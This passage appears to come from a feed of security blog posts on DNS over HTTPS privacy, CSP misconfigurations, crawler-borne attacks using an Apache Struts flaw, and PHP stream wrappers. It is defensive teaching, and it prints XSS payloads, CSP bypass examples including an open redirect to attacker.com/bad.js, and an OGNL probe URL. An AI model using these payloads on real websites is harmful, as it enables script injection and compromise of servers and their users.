    There is a solution to the problem described above and it's not even a DoH-specific one. It's called DNS Query Name Minimization and this is how it works.

    If you want to visit example.com, the conversation between your recursive name server and the other name servers would look like this:

    1. It would ask the internet root servers:
    • Question: "Do you know the nameservers for .com?"
    • Answer: "Yes, here is their IP address"
  • Next, it would ask the .com nameservers:
    • Question: "Do you know the nameservers for example.com?"
    • Answer: "Yes, here is the IP address of the example.com nameserver"
  • Finally, it would ask the example.com nameservers:
    • Question: "Do you know the IP of www.example.com?"
    • Answer: "Yes, it is 123.123.123.123"

    The only name server that knows the full hostname is the one for example.com, since it's also the only server that needs to know it. All the other servers only know a part of the query. This doesn't help you to stay completely anonymous, yet it does reduce the amount of data you give away. This is part of the Firefox DoH implementation and its Trusted Recursive Resolver (TRR) technology.

    There are Some Trust Issues

    The second problem with DoH is Threat Models. Threat Modeling involves identifying potential vulnerabilities and suggesting counter measures. And it means ignoring low-level risks. Even though they are an important part of information security, I'm usually not a fan, at least when it comes to the average user. Sure, air gapping your PC and placing it behind two layers of bulletproof glass and an electric crocodile pit is a little over the top if you only use your computer for playing spider solitaire. But if you need to decide whether you should enable HTTPS for your homepage or not, you don't really need to spend hours pondering your threat model. It takes less than 15 minutes to set up with Let's Encrypt, so just set it up.

    Unfortunately TRR is a completely different beast. I don't know the rationale behind Mozilla's decision, but I assume since it takes a huge amount of bandwidth and the fact that Mozilla may want to have TRR enabled by default in future versions of Firefox, they wanted to build infrastructure that was both reliable and safe from DDoS attacks. If you think about reliability and DDoS proof, Cloudflare immediately comes to mind. Mozilla partnered up with them and use their 1.1.1.1 server for their DoH implementation.

    This causes problems for some people. But, if you only ever visit Facebook and Twitter, you couldn't care less whether Cloudflare knows about your DNS requests. However, if you are a reporter conducting research for articles, and handling sensitive information, you may not want to route all your DNS requests through an American company that could potentially trace it back to you. But there are a few benefits to having an external DoH server. For example, if you are working on an insecure public network, you don't have to communicate with a DNS server via cleartext if you use the encrypted Cloudflare server. Also, all the server's 1.1.1.1 queries will only see a Cloudflare DNS server asking for the IP that belongs to a given hostname, not your IP.

    How Common is it for Tech Companies to Lose Customer Data?

    The question is, is Cloudflare trustworthy? Well, yes of course it is. And they promise to delete any information they have stored about you within 24 hours. But, mistakes happen.

    • Just this year, Twitter admitted to accidentally storing the plaintext passwords of their users in a log file.
    • Then, German domain registrar DomainFactory unintentionally leaked sensitive user account data, which was retrieved by an attacker. I'd love to report that this was an elaborate hack by a gang of sophisticated attackers, probing the company's website and infrastructure for months with the goal of selling the data. But the vulnerability was painfully simple. It appears that they exposed some error data via an XML feed (why would you do that?!) when a user caused an error in some way and a lot of their sensitive data was leaked via that feed. You may wonder what triggered the error for so many users? The culprit – yet again, I wish I was making this up – was actually an error in the gdpr_policy_accepted field. (If you don't know what GDPR is and why this is ironic on multiple levels, you can get up to speed by reading our Whitepaper: The Road to GDPR Compliance.) They asked the user to acknowledge their data protection policy, but when the user clicked 'Yes', an error occurred and the data that should be protected became readable for everyone. This was because the backend expected a boolean value but got a string instead, triggering an error message that contained user data that ended up in a publicly accessible XML feed. Ouch!

    The bottom line is that people make mistakes – even those that work in the IT departments of large corporations. Even at Cloudflare.

    A Single Point of Failure

    What's also worth mentioning is that even if customer data is secure, there might be outages. If 1.1.1.1 becomes the default DNS server for Firefox and there are any availability issues, not a single Firefox user will be able to issue DNS requests or therefore open a website (assuming they changed no default settings). If you think that outages are impossible, given the vast resources Cloudflare boasts, remember that even AWS had a major outage last year. You may not have noticed the outage just by looking at Amazon's status page, since it relied on AWS (the service that it's supposed to monitor) in order to work correctly and show its status!

    That's why Firefox allows you to use your own Trusted Recursive Resolver. You only have to change the IP in the settings – but how many users know about TRR and how to change it or why? One percent would be a very generous estimate and that's troubling.

    Are DNS Over HTTP Servers Secure?

    As we've already established, DNS over HTTPS is a very young technology. It's not clear yet which server software will end up being most popular with website administrators. However, if you simply copy Google or Cloudflare's implementation, you could run into an issue – CORS. Let me cite some text from the I-D:

    The integration with HTTP provides a transport suitable for both existing DNS clients and native web applications seeking access to the DNS. Two primary use cases were considered during this protocol's development. They were preventing on-path devices from interfering with DNS operations and allowing web applications to access DNS information via existing browser APIs in a safe way consistent with Cross Origin Resource Sharing (CORS).

    Format of DoH Responses

    Before we talk about CORS, let's think about the format of DoH responses. The I-D describes the application/dns-message media type, which is essentially a raw DNS packet in the HTTP response message. It's useful for most computer programs as there are already parsers available for that message format. However, the I-D states that it would allow web applications to "access DNS information via existing browser APIs". There is no existing browser API allowing you to decode DNS packets, so that's done on the server side and Google, and Cloudflare can send back a message in JSON format (which, on the other hand, can be easily decoded by a browser).

    However, if your web application that wants to access this data doesn't run on the same host as the DoH server, you encounter a problem. You can't access the data due to the Same Origin Policy (SOP). That's why the Internet Draft mentions CORS. It allows you to access the data anyway, even though the origins don't match.

    But – and let's assume your local server would also have such an API – is that dangerous?

    Well, it can certainly lead to problems in an example where you have set up some custom domains that should only be correctly resolved to the specified IP address from within your network. Let's say your company's website is example.com and you have a special developer.example.com subdomain that should resolve to an internal IP from within the company building. Attackers could trick you into opening a website they control. It would contain JavaScript code that can query your DoH server's API, and try different subdomains and domains. Since it's CORS enabled, attackers could read the response and gain important information about your internal network. They could then use one of the techniques described in our blog post Vulnerable Web Applications on Developers Computers Allow Hackers to Bypass Corporate Firewalls in order to attack it and probe it for weaknesses. That would only work if these DoH servers had a CORS-enabled API as described in the I-D and implemented by Google and Cloudflare.

    How do You Disable Trusted Recursive Resolver or DNS Over HTTP in General?

    As you see, whether TRR/DoH is useful depends on a lot of factors. You need to think about whether you want your DNS requests to be routed through an American company and if it suits your threat model. There, I said it! On the other hand, it's also not ideal to send all of your DNS requests in plaintext.

    If, ultimately, you decide that TRR or DoH are not right for you, this is how you disable it in its current implementations.

    Firefox

    1. If you want to disable DoH in Firefox, you must be brave, as you have to open about:config and dismiss the scary 'This might void your warranty!' dialog.

    Disable DoH in Firefox

    1. Once you do this, you need to search for network.trr.mode in the search bar. You will be left with exactly one option. You can type multiple numbers into the field. And even though this goes without saying, 2 activates DoH and 5, obviously, deactivates it. (Zero and 1 would be simpler, but I'm sure it makes sense on some level.)

    Android

    If DoH is enabled by default in Android Pie, there is an easy way to disable it. Reportedly, there is a setting in the Network and Internet Settings menu, called Private DNS. As mentioned in the Android Developers blog, there is a button you need to check that turns it off. Unfortunately, I'm unable to independently verify that claim, simply because my latest Android phone was made by Samsung (which, unsurprisingly, tells me that my phone is up to date). So, even though technology companies do their best to change DNS for the better, some things just never change.

    Is DNS Over HTTP the future of DNS?

    In this article, we looked at the technology behind DoH and DNS as well as the history of the Domain Name System. While DoH may not  yet be widespread, it is a good and necessary addition to DNS – if implemented correctly. We established that it depends on your personal use of the web whether or not you want to route your DNS requests through an American company. If you don't trust Cloudflare or Google, you can alternatively set up your own DoH resolver, but just beware of vulnerabilities such as the permissive CORS implementation we talked about in this post.


    Negative Impact of Incorrect CSP Implementations

    $
    0
    0

    Content Security Policy (CSP) is an effective client-side security measure that is designed to prevent vulnerabilities such as Cross-Site Scripting (XSS) and Clickjacking. Following the regular discovery of bypass techniques, a group of researchers led by Google managed to fix these weaknesses in CSP version 3.0. With each new bypass that surfaces, browser developers continue to strengthen CSP.

    Negative Impact of Incorrect CSP Implementations

    However, bypasses aren’t the only issue with CSP. Incorrect CSP implementations can also pose critical problems. Keeping in mind that security is not a one time fix, but a process, we're convinced that a significant portion of a secure CSP policy lies in understanding and implementing it correctly.

    Incorrect CSP Implementations

    Useless CSP reports all websites that have incorrectly implemented CSPs. Let’s take a look at some examples.

    Incorrect CSP Implementation on The New Yorker

    In our first example, let's look at the CSP header from the HTTP response of The New Yorker of August 31, 2018:

    Content-Security-Policy: default-src https: data: 'unsafe-inline''unsafe-eval';
    child-src https: data: blob:;
    connect-src https: data: blob:;
    font-src https: data:;
    img-src https: blob: data:;
    media-src blob: data: https:;
    object-src https:;
    script-src https: data: blob: 'unsafe-inline' 'unsafe-eval';
    style-src https: 'unsafe-inline';
    block-all-mixed-content;
    upgrade-insecure-requests;
    report-uri
    https://capture.condenastdigital.com/csp/the-new-yorker

    A quick analysis reveals the following:

    • The CSP commands unsafe-inline and unsafe-eval allow inline scripts and scripts from event attributes to execute, something that is highly damaging to the website's client-site security
    • Really, the only good thing about the header above is that it enforces HTTPS

    Incorrect CSP Implementation on Blogger

    Another incorrectly implemented CSP header reported on Useless CSP was found on Google’s blog service, Blogger:

    content-security-policy: script-src   'self' *.google.com *.google-analytics.com 'unsafe-inline'   'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com   *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com   www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; 
    report-uri /cspreport

    Yet again, note the unsafe-inline and unsafe-eval keywords, which effectively disable any script execution restrictions that were put in place by the whitelisting of certain websites. This was an eye-watering discovering, considering Google is among the leading companies promoting the development of CSP.

    Conclusions

    • These errors demonstrate the fact that everyone makes mistakes, showing how important it is to use an automated web application security scanner which will detect them for you.
    • It's not always easy to add CSP to an existing website. There are many factors developers need to consider when they need to decide from where external resources should be loaded. This involves caching, available bandwidth and general performance. Security often ranks low on the list of considerations. In order to effectively implement CSP, you either need to consider it before writing the application (the easiest option) or find a way add it on top of your existing applications with the tools CSP provides, most notably nonces and hashes.
    • The problem with these examples are the commands unsafe-inline and unsafe-eval, which remove most of the protections CSP provides against Cross Site Scripting.

    How to Ensure a Good CSP Setup

    CSP version 3.0 introduced the option to whitelist code blocks using the strict-dynamic directive. Strict-dynamic (covered in detail later in the post) allows some unsafe options such as unsafe-inline and unsafe-eval to be overridden in CSP 3.0. Whitelisting the data: protocol in script-src and default-src directives lays the grounds for attacks such as the following:

    www.victim.com/index.php?jsfile=data:,alert(1)
    <script src="data:,alert(1);"></script&gt;

    You can find more examples on the Useless CSP website.

    Common Issues in CSP Implementations and Solutions

    An incorrect CSP header implementation not only impacts the security of your website, but can also affect its operation. Websites today rely heavily on third-party sources. These resources are often loaded from the subdomains of the same website (e.g. static.example.com, scripts.example.com).

    The use of inline scripts and JavaScript code in event handlers of HTML elements is quite popular among developers, but that habit isn't really compatible with CSP. It's clever to move inline scripts to a subdomain instead, and load them as an external script. Additionally, the host of all the external scripts must be whitelisted in your Content Security Policy, even if you own the subdomains from which the scripts are loaded.

    How To Determine Whether Your CSP Implementation is Problematic

    In practice, there are only three ways to find out whether you’ll have a problem in the implementation of CSP:

    • You could visit every page and check for errors in your browser's developer console
    • You could wait for the customer complains that your site doesn't work correctly
    • You could use the CSP Report-Only mode

    Naturally, we recommend the third option.

    Testing CSP Implementation with the Report-Only CSP Monitoring Mode

    But how does the report-only mode work? Before publishing the CSP headers on your website, you can try them in Report-Only mode. In Report-Only mode, the CSP directives are not enforced. Instead the browser reports issues regarding the CSP to an end-point specified in the report-uri attribute. This way, you can find any missing directives, the changes you need to implement and the links you have to whitelist in the CSP header – before you enforce these rules. In addition, it helps you to detect inline JavaScript codes and styles and move them into their respective external file.

    Here is an example:

    Content-Security-Policy-Report-Only: script-src 'self'; report-uri /my_amazing_csp_report_parser;

    This sample script-src directive exclusively whitelists its own origin. All script loadings, inline scripts and script codes in event attributes coming from any other origin will trigger the CSP to send a notification to the end-point specified in the report-uri attribute.

    After the testing is complete and you’re ready to push your CSP commands live, you'll have to disable the Report-Only mode for them to be effective.

    This is what the code would look like:

    Content-Security-Policy: script-src 'self'; report-uri /my_amazing_csp_report_parser;

    Note that even though some CSP directives can be set using HTML's meta tags, when in Report-Only mode you cannot do that and have to use an HTTP response header instead. This screenshot shows how Netsparker reports ineffective Report-Only CSP directives in an HTML meta tag.

    Testing CSP Implementation with the Report-Only CSP Monitoring Mode

    Content Security Policy Directives

    In addition to the CSP header, Content Security Policy has many directives that allow you to configure the security of your websites.

    This table lists and explains the directives that can be used to further limit and define the use of resources.

    DirectiveDescription
    base-uri:The base HTML element contains the absolute URL that is prepended to all the relative URLs on the page. This directive helps us restrict the URLs that are allowed to be used in the base HTML element, and therefore prevent Base Tag Hijacking attacks.
    child-src:This directive allows us to define which websites are permitted to be loaded in frames located on the page. We can use it as an extra precaution to protect our page from Frame Injection attacks.
    connect-src:This directive restricts the resources that can be loaded via script interfaces such as XHR or WebSockets. This prevents attackers from stealing data from the site.
    font-src:This directive specifies the font sources that can be loaded using @font-face. It is mostly used to prevent attackers from sending extracted data back to their server using the @font-face src directive.
    form-action:This directive specifies the URLs that can be used as targets for form submissions. It can be used as an extra precaution to protect pages from Form Tag Hijacking and Cross-Site Scripting attacks.
    frame-ancestors:This directive specifies the sites that have the authority to load the current page in a frame, iframe, object, embed, and applet tag. It is a substitute for X-Frame-Options, since it can also help prevent Clickjacking and UI Redressing attacks.
    img-src:This directive defines the sources from which images can be loaded.
    media-src:This directive defines or restricts the sources from which video and audio can be loaded.
    object-src:This directive defines or restricts the sources from <object>, <embed>, and <applet>, which helps preventing Cross-Site Scripting attacks.
    plugin-types:This directive defines or restricts the plugin types that can be loaded.
    report-uri:This directive specifies the URLs that will receive the report when a CSP directive is violated.
    style-src:This directive defines or restricts the sources for CSS files. This allows you to avoid data exfiltration via CSS.
    upgrade-insecure-requests:This directive converts the HTTP requests to HTTPS.

    Examples of How to Use CSP Directives Correctly

    Here are a few examples of how to use CSP directives effectively.

    default-src Directive Example

    By default, these directives are unrestrictive, meaning that if they are not declared in the CSP header, any request will be allowed through. So, if style-src is not set, this will be interpreted as style-src: * , allowing styles from all sources.

    You can use the default-src directive to change this. The specified value will override most directives ending with -src by setting a default value for them. If you set default-src to http://www.example.com, and don’t set a value for font-src, the fonts can only be loaded from http://www.example.com.

    However, default-src cannot override these directives:

    • base-uri
    • form-action
    • frame-ancestors
    • plugin-types
    • report-uri
    • Sandbox

    This is how Netsparker reminds you that default-src does not affect certain directives.

    default-src Directive Example

    object-src to Block Plugins

    We stated above that CSP is a major mechanism in client-based security against various vulnerabilities like XSS. XSS attacks are generally carried out by script executions, so it would seem that limiting the script and style resources as a precaution might be the best way to mitigate against it. However, there are other HTML elements that can run JavaScript code, such as <embed>, <object> and <applet>.

    This is how Netsparker shows that missing the object-src directive in CSP can lead to XSS.

    object-src to Block Plugins

    You might not want to set the default-src since it’s a fallback mechanism and for the reasons stated above. You’ll probably never want to set it to none. However, you might want to block plugin loadings. In this case you can set object-src to none regardless of whatever you set for default-src.

    Example:

    Content-Security-Policy: default-src 'self'; object-src 'none';

    This option will block plugins from loading on your webpage.

    The Keywords That Shape the CSP Directives

    Aside from specifying origins from which resources can be loaded, CSP also offers you a few keywords that allow you to further refine your CSP.

    KeywordsDescription
    'none':As the name suggests, nothing is allowed towill be embedded. For example, the object-src: 'none' command will not embed any objects on the page.
    'self':This matches the origin of the current webpage. Resources from other origins including subdomains will not be loaded.
    'unsafe-inline':This allows the use of inline JavaScript and CSS.
    'unsafe-eval':This allows the use of text-to-JavaScript functions like eval().

    Setting CSP in Meta Tags

    Even though CSP is mostly used to define the directives in HTTP responses, you can set CSP in meta tags, too. This is ideal for situations in which you can't set HTTP response headers:

    <meta http-equiv="Content-Security-Policy" content="default-src https://cdn.example.net; child-src 'none'; object-src 'none'">

    Unfortunately the following directives cannot be used when setting CSP between meta tags:

    frame-ancestors, sandbox, report-uri

    Setting CSP in Meta Tags

    Getting Around the eval Function

    Use of the functions eval, new Function(), setTimeOut and setInterval, which run the text inputs within the document context, is automatically blocked by CSP. To mitigate this, you must make a few changes to the code:

    • If the JSON parsing is carried out using the eval function, you should use the JSON.parse function
    • The strings used in setTimeout or setInterval functions have to be changed to inline functions:

    Instead of:

    setTimeout("document.querySelector('a').style.display = 'none';", 10);

    use:

    setTimeout(() => document.querySelector('a').style.display = 'none', 10);
    • If your template system uses generic functions such as new Function(), you can use a system that supports CSP out-of-the-box, such as Angular. You can also use pre-compilation if your template system supports it.

    You can use the unsafe-eval keyword if you really have to use text-to-Javascript functions like eval. However, be warned that you’ll be creating a huge security gap in the CSP mechanism.

    script-src: 'unsafe-eval'

    Benefits of Reorganizing the Code

    An origin-based limitation mechanism could have solved a lot of problems. However, even if an origin-based mechanism was implemented, there’s would still be a large void in the XSS side, Inline Injection:

    <script>alert(123);</script>
    <a href= onclick="javascript:alert(123)">Click me!</a>
    <img src=1 onerror="alert(1);"/>

    CSP fixes this problem by blocking inline scripts. Not only does CSP block the codes found between the script codes, but it also blocks the script in event attributes and javascript: URLs.

    Therefore you should reorganize the code within the script tags as external files on your website. Doing so has a few benefits:

    • Having the external files cached by the browser will improve the website performance
    • The code will be cleaner
    • Since you will need to minimize the JavaScript code in order to allow fast loading times, this will also make it slightly harder for attackers to find out what it does and how to exploit it

    If you still insist on using inline Javascript and CSS, you must specify it within the appropriate directives:

    script-src: 'unsafe-inline'; style-src: 'unsafe-inline'

    Should You Use nonce or hack in the Whitelist?

    When using CSP to whitelist script or style sources, you’re not limited to origin-based whitelisting the safe resources. You can also use nonce or hash functions to whitelist code blocks.

    Let’s assume  you have a code block as below:

    <script nonce=EDNnf03nceIOfn39fn3e9h3sdfa>
     //Some inline code I cant remove yet, but need to asap.
    </script>

    Content-Security-Policy: script-src 'nonce-EDNnf03nceIOfn39fn3e9h3sdfa'

    You can whitelist the entire code block with a nonce value. As a security measure, for each request, a new nonce value has to be generated, it cannot be reused and has to be random and long.

    On the other hand, while using hash instead of a nonce attribute, you can obtain a hash for the script and whitelist it in the respective header.

    <script>
    alert('Hello, world.');
    </script>

    Content-Security-Policy: script-src 'sha256-qznLcsROx4GACP2dm0UCKCzCG-HiZ1guq6ZZDob_Tng='

    CSP supports SHA256, SHA384, and SHA512 hash algorithms.

    Deprecated CSP Directives

    Like any other technology, CSP has developed over time and some directives have been deprecated. You should know that the X-Content-Security-Policy and X-Webkit-CSP directives have been deprecated. Instead you can use the Content-Security-Policy directive.

    Summary of a Research on CSP 3.0

    A few years ago, researchers from Google released CSP is Dead, Long Live CSP, a risk analysis report on frequently used CSP headers. The research was one of the most comprehensive of its kind, covering 1,687,000 hostnames and 26,000 CSP HTTP headers. It also analyzed the three popular methods used to bypass CSP. These are Open Redirection, Insecure JSONP Endpoint, and AngularJS CSP Compatibility Mode.

    Insecure Endpoint Vulnerabilities Due to Loose CSP Configuration

    The report stated that in the script loadings, 14 out of 15 whitelisted domains have insecure endpoint vulnerabilities and attacks targeting them will deactivate the CSP policies.

    Here are a few examples of the famous CSP bypassing methods listed in the research.

    Bypassing CSP path restrictions:

    Open Redirection:

    Content-Security-Policy: script-src example.org partially-trusted.org/foo/bar.js

    // Allows loading of untrusted resources via:
    <script src="https://www.netsparker.com//example.org?redirect=partially-trusted.org/evil/script.js">

    XSS CSP whitelist bypasses

    Insecure JSONP Endpoint

    <script src="https://www.netsparker.com/api/jsonp?callback=evil"></script>

    AngularJS CSP Compatibility Mode

    <script src="angular.js"></script>

    <div ng-app>{{ executeEvilCodeInUnsafeSandbox() }} </div>

    Using nonce-based CSP for Dynamic Uploads

    Google suggests taking control of CSP policies by using nonce-based policies with dynamic uploads instead of whitelist-based policies. Google started supporting the strict-dynamic method to implement the policy it suggests to users on its own browsers. Let’s take a closer view at how this method works.

    You’ll load a script over example.com/map.js. So you specify a CSP for it:

    Content-Security-Policy: script-src example.com;

    You trust example.com, but you also use the unsafe-inline directive to avoid the objects loaded to DOM from being stuck at the CSP barrier – a small concession for you but a large weakness for the attackers.

    Content-Security-Policy: script-src example.com 'unsafe-inline';

    Besides, by whitelisting the example.com domain in the beginning, we cracked the door open for CSP bypasses from various attack parameters on example.com. Now let’s assume that there’s an open redirection in example.com (note this example below only works in older browsers):

    example.com/redirectme.php?go=http://attacker.com/bad.js

    If you used nonce-based CSP instead, you would’ve gotten rid of any potential attack vector:

    Content-Security-Policy: script-src 'nonce-random-123' 'strict-dynamic';

    <script src="http://example.com/map.js" nonce=random-123></script>

    The above only trusts the script from example.com/map.js by assigning a nonce value to the code block where the script is loaded. By using strict-dynamic, you allow DOM manipulations to be made from this block and even allow scripts to be loaded by the whitelisted JavaScript code. By doing so, you didn’t have to whitelist the entire example.com domain nor use unsafe-inline or unsafe-eval for the loading of dynamic resources, which protects your website from various attacks.

    Backward Compatibility with Earlier Versions of Content Security Policy

    The attribute nonce has been supported since CSP 2.0, and strict-dynamic was introduced in CSP 3.0. So what should you do if the user’s browser does not support CSP 2.0 and you’re using nonce? One option is to use the unsafe-inline directive alongside nonce as a backward compatibility method, as shown:

    Content-Security-Policy: script-src 'nonce-B92E8649B6CF4886241A3E0825BD36A262B24933' 'unsafe-inline'
    <script nonce="B92E8649B6CF4886241A3E0825BD36A262B24933">
    console.log("code works");
    </script>

    When nonce is present, the unsafe-inline command is ignored by the browser. So in browsers that support CSP 2.0 and above, the unsafe-inline command will not be taken into consideration. In browsers where nonce isn’t supported (CSP 1.0), unsafe-inline will be put to work and your page will continue functioning. The backward compatibility implementation for strict-dynamic is as follows:

    Content-Security-Policy: script-src 'nonce-B0A48531D5C5EB3F8503430E6D75C83E23B7AE36' 'strict-dynamic' https: http:

    With the use of strict-dynamic, the browsers that support CSP 3.0 and above will also ignore the https: and http: commands.

    Conclusion

    Content Security Policy is an extensive security measure. With the release of new versions and the discovery of new attack patterns, CSP is evolving. Independent research reveals the dangers of a incorrectly implemented CSP header. Therefore, implementing the correct modification is crucial to ensure the safety and functionality of our websites. This is why we recommend that you scan your web application with the Netsparker web security solution, which checks your CSP configuration and alerts you if it detects an unsafe implementation.

    Authors, Netsparker Security Researchers:

    Ziyahan Albeniz
    Umran Yildirimkaya
    Sven Morgenroth

    Using Google Bots as an Attack Vector

    $
    0
    0

    According to the statistics, Google always has a market share of more than 90% among search engines. Many users use their address bar as Google’s search bar. Therefore, being visible on Google is crucial for websites as it continues to dominate the market.

    Using Google Bots as an Attack Vector

    In this article, we analyze a study from F5 Labs which brings our attention to a new attack vector using Google's crawling servers, also known as Google Bots. These servers gather content from the web to create the searchable index of websites from which Google's Search engine results are taken.

    How Search Engines Use Bots to Index Websites

    Each search engine has unique sets of algorithms, but the common thing they do is to visit any given website, look at the content and links they find (known as 'crawling'), then grade and list the resources. After one of these bots finds your website, it will visit and index it.

    For a good ranking, you need to make sure that search engine bots can crawl your website without issues. Google specifically recommends that you avoid blocking search bots in order to achieve successful indexing. Attackers are aware of these permissions and have developed an interesting technique to exploit them – Abusing Google Bots.

    The Discovery of a Google Bot Attack

    In 2001, Michael Zalewski wrote in Phrak magazine about this trick. He also highlighted how difficult it is to prevent it. Just how difficult became apparent 17 years later, when F5 Labs inspected the CroniX crypto miner. When F5 Labs' researchers analyzed some malicious requests they had logged, they discovered that the requests originated from Google Bots.

    Initially, the F5 Labs researchers assumed that an attacker used the Google Bot's User-Agent header value. But when they investigated the source of the requests, they discovered that the requests were indeed sent from Google.

    There were different explanations for why Google servers would send these malicious requests. One of them would be that Google's servers were hacked. However, that idea was discarded quickly as it wasn't likely. Instead they focused on the scenario laid out by Michael Zalewski, who stated that Google Bots are abused in order to make them behave maliciously.

    How Did the Google Bots Turn Evil?

    Let’s take a look at how attackers can abuse Google Bots in order to use them as a tool for malicious intent.

    First, let's suppose that your website contains the following link:

    <a href="http://victim-address.com/exploit-payload">malicious link<a>

    When Google Bots encounter this URL, they’ll visit it in order to index it. The request that includes the payload will be made by a Google Bot. This image illustrates what happens:

    Using Google Bots as an attack vector diagram

    The Experiment Conducted to Prove the Attack

    Researchers verified the theory that a Google Bot request would carry the payload, by conducting an experiment in which they prepared two websites: one that acted as the attacker, and one that acted as the target. The links that carried the payload were added to the attacker's website and then sent to the target website.

    Once the researchers set the necessary configurations for the Google Bots to browse the website, they then waited for the requests from the Google Bots. When they analyzed the requests, they found out that the requests from the Google Bot servers indeed carried the payload.

    The Limits of the Attack

    This scenario is only possible in GET requests where the payload can be sent through the URL. Another drawback is that the attacker won't be able to read the victim server's response, which means that this attack is only practical if it's possible to send the response out of bounds, like with a command injection or an SQL injection.

    The Combination of Apache Struts Remote Code Evaluation CVE-2018-11776 and Google Bots

    Apache Struts is a Java-based framework released in 2001. The regular discovery of code evaluation vulnerabilities in the framework generated many discussions about its security. For example, the Equifax Breach that facilitated the loss of $439 million and the theft of a huge amount of personal data, was the result of CVE-2017-5638, a critical code execution vulnerability found in the Apache Struts framework.

    A Quick Recap of Apache Struts Remote Code Evaluation CVE-2018-11776

    Let’s recap on the vulnerability that can be exploited on recent Apache Struts versions. The CVE-2018-11776 vulnerability (discovered in August this year) is perfect for a Google Bot attack, since the payload is sent through the URL. Not surprisingly, this was the vulnerability that CroniX abused.

    Example

    Here are two examples:

    When a namespace is not set, the configuration that leads to the vulnerability allows user-defined namespaces to be set from the path. In this situation it's possible to inject an OGNL (Object-Graph Navigation Language) expression. OGNL is an expression language in Java.

    Here is an example of a configuration that is vulnerable to CVE-2018-11776:

    <struts>
    <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />

    <package name="default" extends="struts-default">

    <action name="help">
      <result type="redirectAction">
          <param name="actionName">date.action</param>
      </result>
    </action>
    ..
    ..
    .
    </struts>

    You can use the following sample payload to confirm the existence of CVE-2018-11776. If you open the URL http://your-struts-instance/${4*4}/help.action and you get redirected to http://your-struts-instance/16/date.action, you can confirm that the vulnerability exists.

    As mentioned before, this is the perfect context for a Google Bot attack. As CroniX shows, attackers can go as far as spreading Cryptomining malware using a combination of Apache Struts CVE-2018-11776 and Google Bots.

    Solutions to the Google Bots Attack

    At this point, the possibility of malicious links directed to your website from Google Bots should make you question which third-parties you can really trust. Yet, blocking Google Bot requests entirely would negatively influence your position in the search engine's results. If Google Bots cannot browse your website, this will pull down your ranking in the search results. So if your application detects malicious requests and blocks them, or even blocks the sending IP, attackers could use the Google Bot requests to send malicious payloads, which would result in blocked Google Bots, and therefore further damage your search result rankings.

    Control the External Connections on Your Website

    Attackers can use their websites, or those under their control, to conduct malicious activity using Google Bots. They might also place links on a website in comments under blog posts.

    If you want an overview of the external links on your website, you can check the Out-of-Scope Links node in the Netsparker Knowledge Base following a scan.

    Out of Scope Links

    The Correct Handling of Links Added by Users

    Even though it won't prevent attackers from abusing Google Bots to attack websites, you might still be able to prevent a negative Search Engine Ranking if you take certain precautions. For example, you can prevent search bots from following links using the rel attribute in combination of nofollow. This is how it's done:

    <a rel="nofollow" href="http://www.functravel.com/">Cheap Flights</a>

    Due to the 'nofollow' value of the rel attribute, the bots will not visit the link.

    Similarly, the meta tags you define between the <head></head> tags will help control the behavior of the search bots on all URLs found on the page.

    <meta name="googlebot" content="nofollow" />
    <meta name="robots" content="nofollow" />

    You can give these commands using the X-Robots-Tag response header, too:

    X-Robots-Tag: googlebot: nofollow

    You should note that the commands given with X-Robots-Tag and meta tags apply to all internal and external links.

    Further Reading

    Read more about the research on the Google Bots attack in Abusing Googlebot Services to Deliver Crypto-Mining Malware.

    Authors, Netsparker Security Researchers:

    Ziyahan Albeniz
    Umran Yildirimkaya
    Sven Morgenroth

    The Powerful Resource of PHP Stream Wrappers

    $
    0
    0

    Introduced in PHP 4.3, streams are little known powerful resources that PHP provides.

    PHP Stream Wrappers

    In this article, we will explore ways to bypass protection methods using the PHP Stream Wrappers, which are responsible for handling protocol related tasks like downloading data from a web or ftp server and exposing it in a way in that it can be handled with PHP's stream related functions. First, let's define the key words, such as 'stream' and 'wrappers'.

    What is a Stream in IT?

    In technical terms, a 'stream' is the name given to the transmission of data from source to target. The source and the target might be of various forms: a file, a TCP/IP or a UDP network connection, a standard input and output, a file transfer at a file server or a file archiving process. Even though those streams seem to be heavily different from each other, they have a common thread: they are all basically read and write processes. You either write data from a source to a target, or you transmit the data you read from the source to the target. It might look something like this:

    1. Connection established
    2. Data read
    3. Data written
    4. Connection ended

    Even though the basic actions are to read and write, there are additional actions that need to happen in order to reach a web server or archive a file, or to do a simple input and output process, or establish a connection through TCP/IP or UDP.

    Generic Functions in Streaming Operations

    PHP has some generic functions that enable you to interact with streams:

    • file
    • open
    • fwrite
    • fclose
    • file_get_contents
    • file_put_contents

    In PHP, you use generic functions to perform the various streaming operations without the hassle of using individual functions, making the entire process easier.

    Until today, these functions were mostly part of the stream concept and used in file read-write processes. We can now use wrappers in PHP to do various streaming processes such as HTTP, FTP, SOCKET processes, and standard input/output processes.

    If you want to work with streams, you need to specify their type and target in a specific format. The stream type we’ll use in our generic functions is defined like this:

    <wrapper>://<target>

    The <wrapper> placeholder specifies the stream type we’ll use, for example File, FTP, PHPOUTPUT, PHPINPUT, HTTP or SSL.

    If you are a PHP programmer, the following code will be familiar. It reads the some.txt file and prints its content.

    <?php
    $handle = fopen("some.txt","rb");
    while(feof($handle)!==true) {
       echo fgets($handle);
    }

    In the code, we’re calling the fopen generic stream function using the file:// system wrapper. Technically, the code above does the exact same thing as the code below:

    <?php
    $handle = fopen("file://some.txt","rb");
    while(feof($handle)!==true) {
       echo fgets($handle);
    }

    Since the default wrapper in streaming functions is file://, you don’t have to specify it if you want to use it.

    If you want to know which wrappers you are allowed to use, you can use the code below to list them.

    <?php
       print_r(stream_get_wrappers());

    The Concept of Stream-Context

    The default usage of stream functions may be enough for most use cases. However, there are circumstances where you need more than the default.

    <?php
    file_get_contents(“http://www.example.com/news.php”);

    Let’s assume that the news on http://www.example.com/news.php can be easily read using the file_get_contents command. But what if this website requires some form of authentication to access its contents? In such cases, you can use the stream-context specification that helps customize the stream behavior using optional parameters.

    Here’s a stream-context code sample:

    <?php
       $postdata = '{"username":"ziyahan"}'
       $opts = array('http' =>
           array(
               'method' => 'POST',
               'header' => 'Content-type: application/json;charset=utf-8;\r\n'.
                   'Content-Length: '.mb_strlen($postdata),
               'content' => $postdata
           )
       );

       $context = stream_context_create($opts);
       $response = file_get_contents('http://www.example.com/news.php', false,
       $context);

